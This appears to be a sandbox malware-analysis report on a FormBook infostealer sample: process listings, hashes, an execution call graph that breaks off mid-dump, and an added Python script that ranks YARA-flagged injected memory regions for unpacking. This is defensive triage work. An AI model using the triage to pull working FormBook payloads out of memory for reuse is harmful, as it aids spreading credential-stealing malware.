                                                                  Has exited:false

                                                                  Target ID:7
                                                                  Start time:12:51:02
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe"
                                                                  Imagebase:0x6d0000
                                                                  File size:140'800 bytes
                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:8
                                                                  Start time:12:51:14
                                                                  Start date:10/01/2025
                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                  Imagebase:0x7ff6bf500000
                                                                  File size:676'768 bytes
                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true
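The process list above is what an analyst works from when deciding which memory dump to pull for unpacking: the FormBook YARA hits sit in different processes and in regions with different page protections. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses process blocks in the exact "key:value" and "• Rule: ..., Source: ....sdmp" form shown above (the embedded excerpt is copied from targets 3, 6 and 7) and ranks each hit. The decoding of the .sdmp file-name fields (target ID, base address, PAGE_* protection, MEM_* type) is an assumption inferred from the values in this report, not a documented Joe Sandbox format; the scoring thresholds are mine.

```python
import re

# Excerpt copied from the report's process list above (targets 3, 6 and 7),
# reduced to the keys the triage needs. Real reports carry more keys per block;
# the parser keeps whatever "key:value" lines it finds.
REPORT_EXCERPT = """\
Target ID:3
Path:C:\\Program Files (x86)\\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\\wdFhguqpcrad.exe
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3560926994.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:6
Path:C:\\Windows\\SysWOW64\\wiaacmgr.exe
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561027868.0000000004410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561060314.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3560023676.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Has exited:false

Target ID:7
Path:C:\\Program Files (x86)\\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\\wdFhguqpcrad.exe
Has exited:false
"""

# Win32 memory constants (winnt.h).
PAGE_EXECUTE_ANY = 0x10 | 0x20 | 0x40 | 0x80   # PAGE_EXECUTE* family, 0xF0
PAGE_WRITE_ANY = 0x04 | 0x08 | 0x40 | 0x80     # *READWRITE / *WRITECOPY, 0xCC
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

YARA_LINE = re.compile(r"Rule: ([^,]+),.*Source: (\S+\.sdmp)")


def decode_sdmp(name):
    """Decode a Joe Sandbox memory-dump file name.

    ASSUMPTION: field meanings are inferred from the values in this report, not
    from Joe Sandbox documentation: field 0 = target ID, field 3 = region base
    address, field 4 = Win32 PAGE_* protection, field 6 = MEM_* region type.
    Fields 1, 2, 5 and 7 are left undecoded."""
    fields = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected dump name: {name}")
    protect = int(fields[4], 16)
    mem_type = int(fields[6], 16)
    return {
        "target": int(fields[0]),
        "base": int(fields[3], 16),
        "protect": protect,
        "executable": bool(protect & PAGE_EXECUTE_ANY),
        "writable": bool(protect & PAGE_WRITE_ANY),
        "mem_type": MEM_TYPES.get(mem_type, f"{mem_type:#x}"),
    }


def parse_processes(text):
    """Split the process list into one dict per blank-line-separated block;
    YARA bullet lines become decoded entries under "yara"."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        proc = {"yara": []}
        for line in block.splitlines():
            line = line.strip()
            m = YARA_LINE.search(line)
            if m:
                proc["yara"].append({"rule": m.group(1), **decode_sdmp(m.group(2))})
            elif ":" in line:
                key, _, value = line.partition(":")
                proc[key.strip()] = value.strip()
        procs.append(proc)
    return procs


def is_windows_binary(path):
    """A process whose image lives under C:\\Windows but carries a FormBook
    YARA hit is hosting injected code, not running its own."""
    return path.lower().startswith("c:\\windows\\")


def unpack_candidates(procs):
    """Rank every YARA-hit region. An executable region that is not a mapped
    image (MEM_IMAGE) is where a self-decrypting payload ends up; a hit inside
    a Windows binary adds weight. Higher score = pull that dump first."""
    ranked = []
    for proc in procs:
        for hit in proc["yara"]:
            score, reasons = 0, []
            if hit["executable"] and hit["mem_type"] != "MEM_IMAGE":
                score += 2
                reasons.append(f"executable {hit['mem_type']} region")
            if is_windows_binary(proc["Path"]):
                score += 1
                reasons.append("hit inside a Windows system binary")
            ranked.append({
                "target": int(proc["Target ID"]), "path": proc["Path"],
                "base": hit["base"], "protect": hit["protect"],
                "rule": hit["rule"], "score": score, "reasons": reasons,
            })
    return sorted(ranked, key=lambda c: (-c["score"], c["target"], c["base"]))


if __name__ == "__main__":
    for cand in unpack_candidates(parse_processes(REPORT_EXCERPT)):
        print(f"target {cand['target']} {cand['base']:#x} protect={cand['protect']:#x} "
              f"score={cand['score']} {cand['path']} {'; '.join(cand['reasons'])}")
```

On this report the top candidate is the 0x40 (PAGE_EXECUTE_READWRITE) mapped region at 0x680000 inside wiaacmgr.exe, followed by the 0x40 mapped region at 0x30D0000 in the dropped wdFhguqpcrad.exe; the two PAGE_READWRITE private regions in wiaacmgr.exe rank last because they hold data, not code.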


                                                                    Execution Graph

                                                                    Execution Coverage:2.9%
                                                                    Dynamic/Decrypted Code Coverage:1.9%
                                                                    Signature Coverage:3.4%
                                                                    Total number of Nodes:1837
                                                                    Total number of Limit Nodes:50
                                                                     execution_graph: interactive call graph of 1837 nodes (50 limit nodes), not reproduced here. In the dump each node is "<id> <address> [label]", where the label is the Windows API the sandbox resolved at that address or a collapsed callee such as "13 API calls"; edges are "<id>-><id>". Many nodes carry C-runtime helper names (___scrt_fastfail, __dosmaperr, pre_c_initialization, __wsopen_s, __fread_nolock) rather than API names.
                                                                     API names labelled on the nodes: SystemParametersInfoW, GetPEB, Sleep, CreateFileW, VirtualAlloc, ReadFile, ExitProcess, CharUpperBuffW, RaiseException, RtlAllocateHeap, RtlFreeHeap, GetLastError, EnterCriticalSection, LeaveCriticalSection, WaitForSingleObjectEx, SetEvent, ResetEvent, InitializeCriticalSectionAndSpinCount, InterlockedExchange, GetCurrentProcess, DuplicateHandle, CreateThread, CloseHandle, GetStdHandle, GetFileType, GetStartupInfoW, GetModuleHandleW, OleInitialize, RegisterWindowMessageW, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, GetOpenFileNameW, GetFullPathNameW, GetLongPathNameW, LoadLibraryA, LoadLibraryExW, GetProcAddress, FreeLibrary, CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource, WriteFile, WriteConsoleW, GetConsoleMode.
                                                                     The only nodes outside the 0x8e1000-0x966000 range where the rest of the graph sits form a cluster at 0xbdf7c8-0xbe2c72 labelled GetPEB and Sleep, plus a chain CreateFileW -> VirtualAlloc -> ReadFile -> (13 API calls) -> ExitProcess at 0xbe1c4d-0xbe1d47.
97441->97440 97441->97442 97443 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97441->97443 97441->97444 97503 8f01e0 235 API calls 2 library calls 97441->97503 97504 8f06a0 41 API calls messages 97441->97504 97443->97441 97444->97442 97508 95359c 82 API calls __wsopen_s 97444->97508 97446 8f1376 97445->97446 97447 8f17b0 97445->97447 97448 936331 97446->97448 97449 8f1390 97446->97449 97615 900242 5 API calls __Init_thread_wait 97447->97615 97626 96709c 235 API calls 97448->97626 97452 8f1940 9 API calls 97449->97452 97451 8f17ba 97455 8f17fb 97451->97455 97616 8e9cb3 97451->97616 97456 8f13a0 97452->97456 97454 93633d 97454->97441 97460 936346 97455->97460 97462 8f182c 97455->97462 97458 8f1940 9 API calls 97456->97458 97459 8f13b6 97458->97459 97459->97455 97461 8f13ec 97459->97461 97627 95359c 82 API calls __wsopen_s 97460->97627 97461->97460 97485 8f1408 __fread_nolock 97461->97485 97623 8eaceb 23 API calls messages 97462->97623 97465 8f1839 97624 8fd217 235 API calls 97465->97624 97466 8f17d4 97622 9001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97466->97622 97469 93636e 97628 95359c 82 API calls __wsopen_s 97469->97628 97470 8f152f 97472 9363d1 97470->97472 97473 8f153c 97470->97473 97630 965745 54 API calls _wcslen 97472->97630 97475 8f1940 9 API calls 97473->97475 97477 8f1549 97475->97477 97476 8ffddb 22 API calls 97476->97485 97480 9364fa 97477->97480 97482 8f1940 9 API calls 97477->97482 97478 8f1872 97625 8ffaeb 23 API calls 97478->97625 97479 8ffe0b 22 API calls 97479->97485 97489 936369 97480->97489 97631 95359c 82 API calls __wsopen_s 97480->97631 97487 8f1563 97482->97487 97484 8eec40 235 API calls 97484->97485 97485->97465 97485->97469 97485->97470 97485->97476 97485->97479 97485->97484 97486 9363b2 97485->97486 97485->97489 97629 95359c 82 API calls __wsopen_s 97486->97629 97487->97480 97490 8ea8c7 22 API calls 97487->97490 97492 8f15c7 messages 97487->97492 97489->97441 97490->97492 
97491 8f1940 9 API calls 97491->97492 97492->97478 97492->97480 97492->97489 97492->97491 97494 8f167b messages 97492->97494 97498 8e4f39 68 API calls 97492->97498 97512 94d4ce 97492->97512 97515 95f0ec 97492->97515 97524 96958b 97492->97524 97527 956ef1 97492->97527 97607 951e96 97492->97607 97611 96959f 97492->97611 97493 8f171d 97493->97441 97494->97493 97614 8fce17 22 API calls messages 97494->97614 97498->97492 97503->97441 97504->97441 97505->97414 97506->97419 97507->97442 97508->97442 97509->97442 97510->97440 97511->97442 97632 94dbbe lstrlenW 97512->97632 97637 8e7510 97515->97637 97519 95f136 97520 95f15b 97519->97520 97521 8eec40 235 API calls 97519->97521 97523 95f15f 97520->97523 97688 8e9c6e 22 API calls 97520->97688 97521->97520 97523->97492 97712 967f59 97524->97712 97526 96959b 97526->97492 97528 8ea961 22 API calls 97527->97528 97529 956f1d 97528->97529 97530 8ea961 22 API calls 97529->97530 97531 956f26 97530->97531 97532 956f3a 97531->97532 97981 8eb567 39 API calls 97531->97981 97534 8e7510 53 API calls 97532->97534 97537 956f57 _wcslen 97534->97537 97535 956fbc 97538 8e7510 53 API calls 97535->97538 97536 9570bf 97539 8e4ecb 94 API calls 97536->97539 97537->97535 97537->97536 97606 9570e9 97537->97606 97540 956fc8 97538->97540 97541 9570d0 97539->97541 97544 8ea8c7 22 API calls 97540->97544 97549 956fdb 97540->97549 97542 9570e5 97541->97542 97545 8e4ecb 94 API calls 97541->97545 97543 8ea961 22 API calls 97542->97543 97542->97606 97546 95711a 97543->97546 97544->97549 97545->97542 97547 8ea961 22 API calls 97546->97547 97551 957126 97547->97551 97548 957027 97550 8e7510 53 API calls 97548->97550 97549->97548 97552 957005 97549->97552 97555 8ea8c7 22 API calls 97549->97555 97553 957034 97550->97553 97554 8ea961 22 API calls 97551->97554 97982 8e33c6 97552->97982 97558 957047 97553->97558 97559 95703d 97553->97559 97560 95712f 97554->97560 97555->97552 97557 95700f 97561 8e7510 53 API calls 97557->97561 97991 94e199 GetFileAttributesW 
97558->97991 97562 8ea8c7 22 API calls 97559->97562 97564 8ea961 22 API calls 97560->97564 97565 95701b 97561->97565 97562->97558 97567 957138 97564->97567 97568 8e6350 22 API calls 97565->97568 97566 957050 97569 957063 97566->97569 97572 8e4c6d 22 API calls 97566->97572 97570 8e7510 53 API calls 97567->97570 97568->97548 97571 8e7510 53 API calls 97569->97571 97579 957069 97569->97579 97573 957145 97570->97573 97574 9570a0 97571->97574 97572->97569 97818 8e525f 97573->97818 97992 94d076 57 API calls 97574->97992 97576 957166 97860 8e4c6d 97576->97860 97579->97606 97581 9571a9 97583 8ea8c7 22 API calls 97581->97583 97582 8e4c6d 22 API calls 97584 957186 97582->97584 97585 9571ba 97583->97585 97584->97581 97587 8e6b57 22 API calls 97584->97587 97863 8e6350 97585->97863 97589 95719b 97587->97589 97592 8e6b57 22 API calls 97589->97592 97590 8e6350 22 API calls 97591 9571d6 97590->97591 97593 8e6350 22 API calls 97591->97593 97592->97581 97594 9571e4 97593->97594 97595 8e7510 53 API calls 97594->97595 97596 9571f0 97595->97596 97872 94d7bc 97596->97872 97598 957201 97599 94d4ce 4 API calls 97598->97599 97600 95720b 97599->97600 97601 8e7510 53 API calls 97600->97601 97604 957239 97600->97604 97602 957229 97601->97602 97926 952947 97602->97926 97605 8e4f39 68 API calls 97604->97605 97605->97606 97606->97492 97608 951e9f 97607->97608 97610 951ea4 97607->97610 98079 950f67 97608->98079 97610->97492 97612 967f59 120 API calls 97611->97612 97613 9695af 97612->97613 97613->97492 97614->97494 97615->97451 97617 8e9cc2 _wcslen 97616->97617 97618 8ffe0b 22 API calls 97617->97618 97619 8e9cea __fread_nolock 97618->97619 97620 8ffddb 22 API calls 97619->97620 97621 8e9d00 97620->97621 97621->97466 97622->97455 97623->97465 97624->97478 97625->97478 97626->97454 97627->97489 97628->97489 97629->97489 97630->97487 97631->97489 97633 94d4d5 97632->97633 97634 94dbdc GetFileAttributesW 97632->97634 97633->97492 97634->97633 97635 94dbe8 FindFirstFileW 97634->97635 97635->97633 97636 
94dbf9 FindClose 97635->97636 97636->97633 97638 8e7525 97637->97638 97639 8e7522 97637->97639 97640 8e752d 97638->97640 97641 8e755b 97638->97641 97660 8e9e90 97639->97660 97689 9051c6 26 API calls 97640->97689 97642 9250f6 97641->97642 97644 8e756d 97641->97644 97651 92500f 97641->97651 97692 905183 26 API calls 97642->97692 97690 8ffb21 51 API calls 97644->97690 97645 8e753d 97650 8ffddb 22 API calls 97645->97650 97647 92510e 97647->97647 97652 8e7547 97650->97652 97654 8ffe0b 22 API calls 97651->97654 97659 925088 97651->97659 97653 8e9cb3 22 API calls 97652->97653 97653->97639 97655 925058 97654->97655 97656 8ffddb 22 API calls 97655->97656 97657 92507f 97656->97657 97658 8e9cb3 22 API calls 97657->97658 97658->97659 97691 8ffb21 51 API calls 97659->97691 97693 8e6270 97660->97693 97662 8e9fd2 97699 8ea4a1 22 API calls __fread_nolock 97662->97699 97664 8e9fec 97664->97519 97667 92f699 97676 8ffddb 22 API calls 97667->97676 97668 92f7c4 97709 9496e2 84 API calls __wsopen_s 97668->97709 97670 8ea405 97670->97664 97711 9496e2 84 API calls __wsopen_s 97670->97711 97671 8ea4a1 22 API calls 97687 8e9eb5 97671->97687 97673 8ea6c3 22 API calls 97673->97687 97675 92f7d2 97710 8ea4a1 22 API calls __fread_nolock 97675->97710 97678 92f754 97676->97678 97680 8ffe0b 22 API calls 97678->97680 97679 92f7e8 97679->97664 97681 8ea12c __fread_nolock 97680->97681 97681->97668 97681->97670 97684 8eaec9 22 API calls 97685 8ea0db CharUpperBuffW 97684->97685 97705 8ea673 22 API calls 97685->97705 97687->97662 97687->97667 97687->97668 97687->97670 97687->97671 97687->97673 97687->97681 97687->97684 97698 8e4573 41 API calls _wcslen 97687->97698 97700 8ea587 97687->97700 97706 8e48c8 23 API calls 97687->97706 97707 8e49bd 22 API calls __fread_nolock 97687->97707 97708 8ea673 22 API calls 97687->97708 97688->97523 97689->97645 97690->97645 97691->97642 97692->97647 97694 8ffe0b 22 API calls 97693->97694 97695 8e6295 97694->97695 97696 8ffddb 22 API calls 97695->97696 97697 8e62a3 
97696->97697 97697->97687 97698->97687 97699->97664 97701 8ea59d 97700->97701 97704 8ea598 __fread_nolock 97700->97704 97702 92f80f 97701->97702 97703 8ffe0b 22 API calls 97701->97703 97703->97704 97704->97687 97705->97687 97706->97687 97707->97687 97708->97687 97709->97675 97710->97679 97711->97664 97713 8e7510 53 API calls 97712->97713 97714 967f90 97713->97714 97736 967fd5 messages 97714->97736 97750 968cd3 97714->97750 97716 968281 97717 96844f 97716->97717 97721 96828f 97716->97721 97791 968ee4 60 API calls 97717->97791 97720 96845e 97720->97721 97722 96846a 97720->97722 97763 967e86 97721->97763 97722->97736 97723 8e7510 53 API calls 97740 968049 97723->97740 97728 9682c8 97778 8ffc70 97728->97778 97731 968302 97785 8e63eb 22 API calls 97731->97785 97732 9682e8 97784 95359c 82 API calls __wsopen_s 97732->97784 97735 9682f3 GetCurrentProcess TerminateProcess 97735->97731 97736->97526 97737 968311 97786 8e6a50 22 API calls 97737->97786 97739 96832a 97748 968352 97739->97748 97787 8f04f0 22 API calls 97739->97787 97740->97716 97740->97723 97740->97736 97782 94417d 22 API calls __fread_nolock 97740->97782 97783 96851d 42 API calls _strftime 97740->97783 97742 9684c5 97742->97736 97744 9684d9 FreeLibrary 97742->97744 97743 968341 97788 968b7b 75 API calls 97743->97788 97744->97736 97748->97742 97789 8f04f0 22 API calls 97748->97789 97790 8eaceb 23 API calls messages 97748->97790 97792 968b7b 75 API calls 97748->97792 97751 8eaec9 22 API calls 97750->97751 97752 968cee CharLowerBuffW 97751->97752 97793 948e54 97752->97793 97756 8ea961 22 API calls 97757 968d2a 97756->97757 97800 8e6d25 97757->97800 97759 968d3e 97760 8e93b2 22 API calls 97759->97760 97762 968d48 _wcslen 97760->97762 97761 968e5e _wcslen 97761->97740 97762->97761 97813 96851d 42 API calls _strftime 97762->97813 97764 967ea1 97763->97764 97768 967eec 97763->97768 97765 8ffe0b 22 API calls 97764->97765 97766 967ec3 97765->97766 97767 8ffddb 22 API calls 97766->97767 97766->97768 97767->97766 97769 
969096 97768->97769 97770 9692ab messages 97769->97770 97777 9690ba _strcat _wcslen 97769->97777 97770->97728 97771 8eb6b5 39 API calls 97771->97777 97772 8eb567 39 API calls 97772->97777 97773 8eb38f 39 API calls 97773->97777 97774 8e7510 53 API calls 97774->97777 97775 90ea0c 21 API calls ___std_exception_copy 97775->97777 97777->97770 97777->97771 97777->97772 97777->97773 97777->97774 97777->97775 97817 94efae 24 API calls _wcslen 97777->97817 97779 8ffc85 97778->97779 97780 8ffd1d VirtualProtect 97779->97780 97781 8ffceb 97779->97781 97780->97781 97781->97731 97781->97732 97782->97740 97783->97740 97784->97735 97785->97737 97786->97739 97787->97743 97788->97748 97789->97748 97790->97748 97791->97720 97792->97748 97794 948e74 _wcslen 97793->97794 97795 948f63 97794->97795 97797 948ea9 97794->97797 97798 948f68 97794->97798 97795->97756 97795->97762 97797->97795 97814 8fce60 41 API calls 97797->97814 97798->97795 97815 8fce60 41 API calls 97798->97815 97801 8e6d34 97800->97801 97802 8e6d91 97800->97802 97801->97802 97804 8e6d3f 97801->97804 97803 8e93b2 22 API calls 97802->97803 97810 8e6d62 __fread_nolock 97803->97810 97805 8e6d5a 97804->97805 97806 924c9d 97804->97806 97816 8e6f34 22 API calls 97805->97816 97808 8ffddb 22 API calls 97806->97808 97809 924ca7 97808->97809 97811 8ffe0b 22 API calls 97809->97811 97810->97759 97812 924cda 97811->97812 97813->97761 97814->97797 97815->97798 97816->97810 97817->97777 97819 8ea961 22 API calls 97818->97819 97820 8e5275 97819->97820 97821 8ea961 22 API calls 97820->97821 97822 8e527d 97821->97822 97823 8ea961 22 API calls 97822->97823 97824 8e5285 97823->97824 97825 8ea961 22 API calls 97824->97825 97826 8e528d 97825->97826 97827 923df5 97826->97827 97828 8e52c1 97826->97828 97829 8ea8c7 22 API calls 97827->97829 97830 8e6d25 22 API calls 97828->97830 97831 923dfe 97829->97831 97832 8e52cf 97830->97832 97833 8ea6c3 22 API calls 97831->97833 97834 8e93b2 22 API calls 97832->97834 97837 8e5304 97833->97837 97835 8e52d9 
97834->97835 97835->97837 97838 8e6d25 22 API calls 97835->97838 97836 8e5349 97840 8e6d25 22 API calls 97836->97840 97837->97836 97839 8e5325 97837->97839 97849 923e20 97837->97849 97841 8e52fa 97838->97841 97839->97836 97844 8e4c6d 22 API calls 97839->97844 97843 8e535a 97840->97843 97842 8e93b2 22 API calls 97841->97842 97842->97837 97845 8e5370 97843->97845 97850 8ea8c7 22 API calls 97843->97850 97847 8e5332 97844->97847 97846 8e5384 97845->97846 97853 8ea8c7 22 API calls 97845->97853 97851 8e538f 97846->97851 97856 8ea8c7 22 API calls 97846->97856 97847->97836 97855 8e6d25 22 API calls 97847->97855 97848 8e6b57 22 API calls 97852 923ee0 97848->97852 97849->97848 97850->97845 97854 8e539a 97851->97854 97857 8ea8c7 22 API calls 97851->97857 97852->97836 97858 8e4c6d 22 API calls 97852->97858 97993 8e49bd 22 API calls __fread_nolock 97852->97993 97853->97846 97854->97576 97855->97836 97856->97851 97857->97854 97858->97852 97861 8eaec9 22 API calls 97860->97861 97862 8e4c78 97861->97862 97862->97581 97862->97582 97864 924a51 97863->97864 97865 8e6362 97863->97865 98004 8e4a88 22 API calls __fread_nolock 97864->98004 97994 8e6373 97865->97994 97868 8e636e 97868->97590 97869 924a67 97870 924a5b 97870->97869 97871 8ea8c7 22 API calls 97870->97871 97871->97869 97873 94d7d8 97872->97873 97874 94d7f3 97873->97874 97875 94d7dd 97873->97875 97876 8ea961 22 API calls 97874->97876 97877 8ea8c7 22 API calls 97875->97877 97925 94d7ee 97875->97925 97878 94d7fb 97876->97878 97877->97925 97879 8ea961 22 API calls 97878->97879 97880 94d803 97879->97880 97881 8ea961 22 API calls 97880->97881 97882 94d80e 97881->97882 97883 8ea961 22 API calls 97882->97883 97884 94d816 97883->97884 97885 8ea961 22 API calls 97884->97885 97886 94d81e 97885->97886 97887 8ea961 22 API calls 97886->97887 97888 94d826 97887->97888 97889 8ea961 22 API calls 97888->97889 97890 94d82e 97889->97890 97891 8ea961 22 API calls 97890->97891 97892 94d836 97891->97892 97893 8e525f 22 API calls 97892->97893 97894 
94d84d 97893->97894 97895 8e525f 22 API calls 97894->97895 97896 94d866 97895->97896 97897 8e4c6d 22 API calls 97896->97897 97898 94d872 97897->97898 97899 94d885 97898->97899 97900 8e93b2 22 API calls 97898->97900 97901 8e4c6d 22 API calls 97899->97901 97900->97899 97902 94d88e 97901->97902 97903 94d89e 97902->97903 97904 8e93b2 22 API calls 97902->97904 97905 94d8b0 97903->97905 97906 8ea8c7 22 API calls 97903->97906 97904->97903 97907 8e6350 22 API calls 97905->97907 97906->97905 97908 94d8bb 97907->97908 98005 94d978 22 API calls 97908->98005 97910 94d8ca 98006 94d978 22 API calls 97910->98006 97912 94d8dd 97913 8e4c6d 22 API calls 97912->97913 97914 94d8e7 97913->97914 97915 94d8ec 97914->97915 97916 94d8fe 97914->97916 97917 8e33c6 22 API calls 97915->97917 97918 8e4c6d 22 API calls 97916->97918 97919 94d8f9 97917->97919 97920 94d907 97918->97920 97922 8e6350 22 API calls 97919->97922 97921 94d925 97920->97921 97924 8e33c6 22 API calls 97920->97924 97923 8e6350 22 API calls 97921->97923 97922->97921 97923->97925 97924->97919 97925->97598 97927 952954 __wsopen_s 97926->97927 97928 8ffe0b 22 API calls 97927->97928 97929 952971 97928->97929 97930 8e5722 22 API calls 97929->97930 97931 95297b 97930->97931 97932 95274e 27 API calls 97931->97932 97933 952986 97932->97933 97934 8e511f 64 API calls 97933->97934 97935 95299b 97934->97935 97936 952a6c 97935->97936 97937 9529bf 97935->97937 97938 952e66 75 API calls 97936->97938 97939 952e66 75 API calls 97937->97939 97954 952a38 97938->97954 97940 9529c4 97939->97940 97944 952a75 messages 97940->97944 98020 90d583 26 API calls 97940->98020 97942 8e50f5 40 API calls 97943 952a91 97942->97943 97945 8e50f5 40 API calls 97943->97945 97944->97604 97947 952aa1 97945->97947 97946 9529ed 98021 90d583 26 API calls 97946->98021 97948 8e50f5 40 API calls 97947->97948 97950 952abc 97948->97950 97951 8e50f5 40 API calls 97950->97951 97952 952acc 97951->97952 97953 8e50f5 40 API calls 97952->97953 97955 952ae7 97953->97955 
97954->97942 97954->97944 97956 8e50f5 40 API calls 97955->97956 97957 952af7 97956->97957 97958 8e50f5 40 API calls 97957->97958 97959 952b07 97958->97959 97960 8e50f5 40 API calls 97959->97960 97961 952b17 97960->97961 98007 953017 GetTempPathW GetTempFileNameW 97961->98007 97963 952b22 97964 90e5eb 29 API calls 97963->97964 97974 952b33 97964->97974 97965 952bed 97966 90e678 67 API calls 97965->97966 97967 952bf8 97966->97967 97969 952c12 97967->97969 97970 952bfe DeleteFileW 97967->97970 97968 8e50f5 40 API calls 97968->97974 97971 952c91 CopyFileW 97969->97971 97977 952c18 97969->97977 97970->97944 97972 952ca7 DeleteFileW 97971->97972 97973 952cb9 DeleteFileW 97971->97973 97972->97944 98017 952fd8 CreateFileW 97973->98017 97974->97944 97974->97965 97974->97968 98008 90dbb3 97974->98008 98022 9522ce 79 API calls 97977->98022 97979 952c7c 97979->97973 97980 952c80 DeleteFileW 97979->97980 97980->97944 97981->97532 97983 8e33dd 97982->97983 97984 9230bb 97982->97984 98069 8e33ee 97983->98069 97986 8ffddb 22 API calls 97984->97986 97988 9230c5 _wcslen 97986->97988 97987 8e33e8 97987->97557 97989 8ffe0b 22 API calls 97988->97989 97990 9230fe __fread_nolock 97989->97990 97991->97566 97992->97579 97993->97852 97996 8e6382 97994->97996 98001 8e63b6 __fread_nolock 97994->98001 97995 924a82 97998 8ffddb 22 API calls 97995->97998 97996->97995 97997 8e63a9 97996->97997 97996->98001 97999 8ea587 22 API calls 97997->97999 98000 924a91 97998->98000 97999->98001 98002 8ffe0b 22 API calls 98000->98002 98001->97868 98003 924ac5 __fread_nolock 98002->98003 98004->97870 98005->97910 98006->97912 98007->97963 98009 90dbc1 98008->98009 98015 90dbdd 98008->98015 98010 90dbe3 98009->98010 98011 90dbcd 98009->98011 98009->98015 98023 90d9cc 98010->98023 98026 90f2d9 20 API calls __dosmaperr 98011->98026 98014 90dbd2 98027 9127ec 26 API calls pre_c_initialization 98014->98027 98015->97974 98018 953013 98017->98018 98019 952fff SetFileTime CloseHandle 98017->98019 98018->97944 
98019->98018 98020->97946 98021->97954 98022->97979 98028 90d97b 98023->98028 98025 90d9f0 98025->98015 98026->98014 98027->98015 98029 90d987 ___BuildCatchObject 98028->98029 98036 90918d EnterCriticalSection 98029->98036 98031 90d995 98037 90d9f4 98031->98037 98035 90d9b3 __fread_nolock 98035->98025 98036->98031 98045 9149a1 98037->98045 98043 90d9a2 98044 90d9c0 LeaveCriticalSection __fread_nolock 98043->98044 98044->98035 98046 90d955 __fread_nolock 26 API calls 98045->98046 98047 9149b0 98046->98047 98048 91f89b __fread_nolock 26 API calls 98047->98048 98049 9149b6 98048->98049 98053 90da09 98049->98053 98066 913820 21 API calls __dosmaperr 98049->98066 98051 914a15 98052 9129c8 _free 20 API calls 98051->98052 98052->98053 98054 90da3a 98053->98054 98056 90da4c 98054->98056 98060 90da24 98054->98060 98055 90da5a 98067 90f2d9 20 API calls __dosmaperr 98055->98067 98056->98055 98056->98060 98064 90da85 __fread_nolock 98056->98064 98058 90da5f 98068 9127ec 26 API calls pre_c_initialization 98058->98068 98065 914a56 62 API calls 98060->98065 98061 90dc0b 62 API calls 98061->98064 98062 90d955 __fread_nolock 26 API calls 98062->98064 98063 9159be __wsopen_s 62 API calls 98063->98064 98064->98060 98064->98061 98064->98062 98064->98063 98065->98043 98066->98051 98067->98058 98068->98060 98070 8e33fe _wcslen 98069->98070 98071 92311d 98070->98071 98072 8e3411 98070->98072 98073 8ffddb 22 API calls 98071->98073 98074 8ea587 22 API calls 98072->98074 98075 923127 98073->98075 98076 8e341e __fread_nolock 98074->98076 98077 8ffe0b 22 API calls 98075->98077 98076->97987 98078 923157 __fread_nolock 98077->98078 98080 950f7e 98079->98080 98094 951097 98079->98094 98081 950f9e 98080->98081 98082 950fcb 98080->98082 98084 950fe2 98080->98084 98081->98082 98087 950fb2 98081->98087 98083 8ffe0b 22 API calls 98082->98083 98088 950fc0 __fread_nolock 98083->98088 98085 8ffe0b 22 API calls 98084->98085 98095 950fff 98084->98095 98085->98095 98086 951026 98090 8ffe0b 22 API calls 
98086->98090 98089 8ffe0b 22 API calls 98087->98089 98091 8ffddb 22 API calls 98088->98091 98089->98088 98092 95102c 98090->98092 98091->98094 98098 8ff1d8 22 API calls 98092->98098 98094->97610 98095->98086 98095->98087 98095->98088 98096 951038 98099 8ff6c9 24 API calls 98096->98099 98098->98096 98099->98088 98100 933a41 98104 9510c0 98100->98104 98102 933a4c 98103 9510c0 53 API calls 98102->98103 98103->98102 98105 9510cd 98104->98105 98114 9510fa 98104->98114 98106 9510fc 98105->98106 98107 951101 98105->98107 98112 9510f4 98105->98112 98105->98114 98116 8ffa11 53 API calls 98106->98116 98109 8e7510 53 API calls 98107->98109 98110 951108 98109->98110 98111 8e6350 22 API calls 98110->98111 98111->98114 98115 8eb270 39 API calls 98112->98115 98114->98102 98115->98114 98116->98107 98117 932a00 98132 8ed7b0 messages 98117->98132 98118 8edb11 PeekMessageW 98118->98132 98119 8ed807 GetInputState 98119->98118 98119->98132 98121 931cbe TranslateAcceleratorW 98121->98132 98122 8eda04 timeGetTime 98122->98132 98123 8edb8f 